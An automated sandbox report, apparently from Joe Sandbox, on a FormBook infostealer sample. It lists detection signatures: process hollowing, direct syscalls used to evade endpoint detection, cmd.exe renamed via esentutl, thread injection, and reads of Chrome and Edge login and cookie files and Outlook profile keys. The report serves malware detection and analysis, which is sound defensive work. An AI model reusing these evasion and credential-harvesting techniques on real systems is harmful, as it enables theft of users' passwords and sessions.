Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE652A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE652A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE652A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE652A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE652A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE652A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE72A0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE72A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE72A0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE72A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED92BC mov eax, dword ptr fs:[00000030h]	6_2_1BED92BC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED92BC mov eax, dword ptr fs:[00000030h]	6_2_1BED92BC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED92BC mov ecx, dword ptr fs:[00000030h]	6_2_1BED92BC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED92BC mov ecx, dword ptr fs:[00000030h]	6_2_1BED92BC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF192A6 mov eax, dword ptr fs:[00000030h]	6_2_1BF192A6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF192A6 mov eax, dword ptr fs:[00000030h]	6_2_1BF192A6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF192A6 mov eax, dword ptr fs:[00000030h]	6_2_1BF192A6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF192A6 mov eax, dword ptr fs:[00000030h]	6_2_1BF192A6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF25283 mov eax, dword ptr fs:[00000030h]	6_2_1BF25283
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8329E mov eax, dword ptr fs:[00000030h]	6_2_1BE8329E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8329E mov eax, dword ptr fs:[00000030h]	6_2_1BE8329E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE79274 mov eax, dword ptr fs:[00000030h]	6_2_1BE79274
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91270 mov eax, dword ptr fs:[00000030h]	6_2_1BE91270
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91270 mov eax, dword ptr fs:[00000030h]	6_2_1BE91270

Source: C:\Users\Public\alpha.pif

Code function: 9_2_0025DCD0 GetProcessHeap,RtlAllocateHeap,

9_2_0025DCD0

Source: C:\Users\Public\alpha.pif	Code function: 9_2_00266EC0 SetUnhandledExceptionFilter,		9_2_00266EC0
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00266B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		9_2_00266B40

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Memory allocated: C:\Users\user\Links\iaoqralA.pif base: 400000 protect: page execute and read and write

Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtDeviceIoControlFile: Direct from: 0x77012AEC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtAllocateVirtualMemory: Direct from: 0x77012BEC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtAllocateVirtualMemory: Direct from: 0x770148EC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtSetInformationThread: Direct from: 0x77012B4C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQueryAttributesFile: Direct from: 0x77012E6C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQueryVolumeInformationFile: Direct from: 0x77012F2C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtOpenSection: Direct from: 0x77012E0C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQuerySystemInformation: Direct from: 0x770148CC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtOpenKeyEx: Direct from: 0x77012B9C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtProtectVirtualMemory: Direct from: 0x77012F9C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtCreateFile: Direct from: 0x77012FEC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtOpenFile: Direct from: 0x77012DCC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQueryInformationToken: Direct from: 0x77012CAC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtTerminateThread: Direct from: 0x77012FCC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtProtectVirtualMemory: Direct from: 0x77007B2E	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtAllocateVirtualMemory: Direct from: 0x77012BFC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtReadFile: Direct from: 0x77012ADC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtNotifyChangeKey: Direct from: 0x77013C2C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtCreateMutant: Direct from: 0x770135CC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtSetInformationProcess: Direct from: 0x77012C5C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtResumeThread: Direct from: 0x770136AC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtSetInformationThread: Direct from: 0x770063F9	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtWriteVirtualMemory: Direct from: 0x77012E3C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtMapViewOfSection: Direct from: 0x77012D1C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtAllocateVirtualMemory: Direct from: 0x77013C9C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtWriteVirtualMemory: Direct from: 0x7701490C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtClose: Direct from: 0x77012B6C
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtReadVirtualMemory: Direct from: 0x77012E8C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtCreateKey: Direct from: 0x77012C6C	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtDelayExecution: Direct from: 0x77012DDC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQuerySystemInformation: Direct from: 0x77012DFC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtQueryInformationProcess: Direct from: 0x77012C26	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtResumeThread: Direct from: 0x77012FBC	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	NtCreateUserProcess: Direct from: 0x7701371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Links\iaoqralA.pif	Section loaded: NULL target: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Links\iaoqralA.pif	Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\systeminfo.exe

Thread register set: target process: 7388

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\systeminfo.exe

Thread APC queued: target process: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Section unmapped: C:\Users\user\Links\iaoqralA.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Memory written: C:\Users\user\Links\iaoqralA.pif base: 3CF008

Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: oSAWneqzPiahr.exe, 00000013.00000002.3576074519.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000000.1286676347.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437646864.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: oSAWneqzPiahr.exe, 00000013.00000002.3576074519.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000000.1286676347.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437646864.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: oSAWneqzPiahr.exe, 00000013.00000002.3576074519.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000000.1286676347.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437646864.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: oSAWneqzPiahr.exe, 00000013.00000002.3576074519.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000000.1286676347.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437646864.00000000017B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02CF5694
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: GetLocaleInfoA,	0_2_02CFA2D8
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: GetLocaleInfoA,	0_2_02CFA28C
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02CF57A0
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	9_2_00258572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	9_2_00256854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	9_2_00259310

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02CF8D0C GetLocalTime,

0_2_02CF8D0C

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D0A94C GetUserNameA,

0_2_02D0A94C

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02CFB20C GetVersionExA,

0_2_02CFB20C

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1366673242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3576641121.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1381979341.000000001BD90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3578481874.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576518310.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3574489923.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1382817620.000000001D6D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576588252.0000000004340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\systeminfo.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1366673242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3576641121.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1381979341.000000001BD90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3578481874.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576518310.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3574489923.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1382817620.000000001D6D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576588252.0000000004340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Valid Accounts	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	126 System Information Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	1 Software Packing	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	2 Virtualization/Sandbox Evasion	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	612 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E8q16bf9QD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
E8q16bf9QD.exe